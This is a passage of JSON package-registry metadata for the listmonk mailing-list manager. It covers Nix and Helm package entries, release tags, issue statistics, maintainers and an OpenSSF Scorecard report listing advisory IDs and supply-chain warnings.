d.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-25T19:04:40.817Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.37535727814318676,"forks_count":0.449395640345742,"docker_downloads_count":null,"average":0.20618822962223218},"purl":"pkg:nix/listmonk?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-19T09:41:42.354Z","issues_count":932,"pull_requests_count":434,"avg_time_to_close_issue":6062124.62635659,"avg_time_to_close_pull_request":1080531.868945869,"issues_closed_count":645,"pull_requests_closed_count":351,"pull_request_authors_count":190,"issue_authors_count":627,"avg_comments_per_issue":2.7435622317596566,"avg_comments_per_pull_request":1.195852534562212,"merged_pull_requests_count":241,"bot_issues_count":0,"bot_pull_requests_count":71,"past_year_issues_count":96,"past_year_pull_requests_count":76,"past_year_avg_time_to_close_issue":3545848.763157895,"past_year_avg_time_to_close_pull_request":605370.9818181818,"past_year_issues_closed_count":38,"past_year_pull_requests_closed_count":55,"past_year_pull_request_authors_count":47,"past_year_issue_authors_count":82,"past_year_avg_comments_per_issue":1.6458333333333333,"past_year_avg_comments_per_pull_request":1.3552631578947367,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":20,"past_year_merged_pull_requests_count":24,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/listmonk/codemeta","maintainers":[{"uuid":"RaitoBezarius","login":null,"name":"Ryan Lahfa","email":"ryan@lahfa.xyz","url":"https://github.com/RaitoBezarius","packages_count":97,"html_url":null,"role":null,"created_at":"2026-03-06T20:08:01.747Z","updated_at":"2026-03-06T20:08:01.747Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/RaitoBezarius/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3581},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-09-01T05:03:04.490Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":13678154,"name":"deliveryhero/listmonk","ecosystem":"helm","description":"A Helm chart for listmonk application","homepage":"https://github.com/knadh/listmonk","licenses":"Unknown","normalized_licenses":["Other"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":"deliveryhero","versions_count":13,"first_release_published_at":"2021-09-13T16:10:16.000Z","latest_release_published_at":"2026-02-12T14:47:28.000Z","latest_release_number":"0.1.12","last_synced_at":"2026-08-25T13:50:12.303Z","created_at":"2026-02-12T16:31:57.427Z","updated_at":"2026-08-28T07:01:53.706Z","registry_url":"https://artifacthub.io/packages/helm/deliveryhero/listmonk","install_command":"helm repo add deliveryhero https://raw.githubusercontent.com/deliveryhero/helm-charts/refs/heads/master/ \u0026\u0026 helm install listmonk deliveryhero/listmonk","documentation_url":"https://artifacthub.io/packages/helm/deliveryhero/listmonk","metadata":{"app_version":"v2.1.0","chart_version":"0.1.12","category":null,"official":false,"deprecated":false,"repository_url":"https://raw.githubusercontent.com/deliveryhero/helm-charts/refs/heads/master/","maintainers":[]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-22T08:24:51.000Z","size":52262,"stargazers_count":23109,"open_issues_count":109,"forks_count":2551,"subscribers_count":142,"default_branch":"master","last_synced_at":"2026-08-25T13:49:36.001Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-25T13:22:53.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36904960,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-25T02:00:06.831Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/